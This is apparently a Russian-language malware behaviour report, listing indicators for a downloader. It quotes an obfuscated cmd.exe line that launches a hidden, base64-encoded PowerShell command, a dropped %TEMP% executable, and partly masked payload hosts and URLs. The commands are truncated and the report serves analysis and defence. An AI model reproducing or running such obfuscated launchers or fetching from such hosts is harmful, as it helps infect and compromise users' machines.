Техническая информация
- '<SYSTEM32>\cmd.exe' /V /C "set %ZwbcnJjKZ%=vsMpiMPTp&&set %KzqniMwXn%=p^o^we^rs&&set %llCVIzXmA%=zLqAdswBa&&set %twibjVbZA%=he^ll&&set %YvUQokvkl%=cWrdSosLF&&!%KzqniMwXn%!!%twibjVbZA%! ^-^e LgAgACgAIAAkAEUAbgBWADo...
- %TEMP%\54555.exe
- %TEMP%\54555.exe
- 'pu####odukties.nl':80
- 'br###e-loehr.de':80
- 'br###e-loehr.de':443
- 'bj#.de':80
- 'vi####am-gmbh.de':80
- 'wl##i.net':80
- http://pu####odukties.nl/RMauWGgE/
- http://br###e-loehr.de/mkFRFHF/
- http://bj#.de/sUku/
- http://vi####am-gmbh.de/esohmhCZa/
- http://wl##i.net/NvoHkFXZe/
- 'br###e-loehr.de':443
- DNS ASK pu####odukties.nl
- DNS ASK br###e-loehr.de
- DNS ASK bj#.de
- DNS ASK vi####am-gmbh.de
- DNS ASK wl##i.net
- '<SYSTEM32>\cmd.exe' /V /C "set %ZwbcnJjKZ%=vsMpiMPTp&&set %KzqniMwXn%=p^o^we^rs&&set %llCVIzXmA%=zLqAdswBa&&set %twibjVbZA%=he^ll&&set %YvUQokvkl%=cWrdSosLF&&!%KzqniMwXn%!!%twibjVbZA%! ^-^e LgAgACgAIAAkAEUAbgBWADo...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e LgAgACgAIAAkAEUAbgBWADoAUABVAGIAbABpAEMAWwAxADMAXQArACQAZQBuAHYAOgBQAFUAQgBMAEkAQwBbADUAXQArACcAWAAnACkAIAAoACAAIgAkACgAUwBFAHQALQBJAFQAZQBtACAAJwB2AGEAUgBpAEEAQgBsAEUAOgBPAEYAUwAnACAAJwAnAC...